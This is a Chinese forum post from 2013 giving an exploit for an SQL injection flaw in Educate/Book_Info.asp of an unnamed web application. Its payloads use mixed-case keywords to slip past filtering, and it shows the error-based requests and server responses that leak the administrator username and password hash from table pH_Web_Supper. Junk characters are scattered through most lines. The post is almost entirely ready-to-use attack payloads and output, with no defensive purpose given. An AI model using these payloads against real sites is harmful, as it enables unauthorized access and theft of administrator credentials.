漏洞出现在Educate/Book_Info.asp 5 y3 b" w! G; L, }, W% f% e
6 c$ `' |7 x- P3 M) V
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
& e7 @! ^6 i: z; b
) `. o3 q/ D- d2 ~exp:如下 {7 f" p. b! a1 ?
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)# O" n% Q3 z$ ]9 y1 A. `
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
3 ?: k! p6 \2 d4 G: z
3 E5 W% y- ?6 }/ T3 _- ~http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)4 R$ V" X' I' b, F b+ j8 e
1 t# t# \* a' s ?Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
# w' D0 P d ]8 G3 ^2 @% v
% B: v: V$ ?( I3 @5 ^将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
/ }8 r* C Y/ D d: T) Q
0 K/ Y5 J8 I. K6 b) g8 k/Educate/Book_Info.asp,行 8
# O3 y6 `8 o- d+ S# G3 d$ R ( p( q; V' ]& A) M U! h- E
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
' L) K+ k* o0 r0 K3 N) f
5 |4 ]7 D3 ~/ d7 nMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
6 I5 e/ t! M# X6 p
5 `8 D* F* y) l" s将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
( n# f3 E( A! J
% n* p1 Z' p% T N. P/ x' J/Educate/Book_Info.asp,行 8
' Q# s5 m8 l7 H' L/ X& A |
发表于 2013-2-16 21:44:16
收藏
支持
反对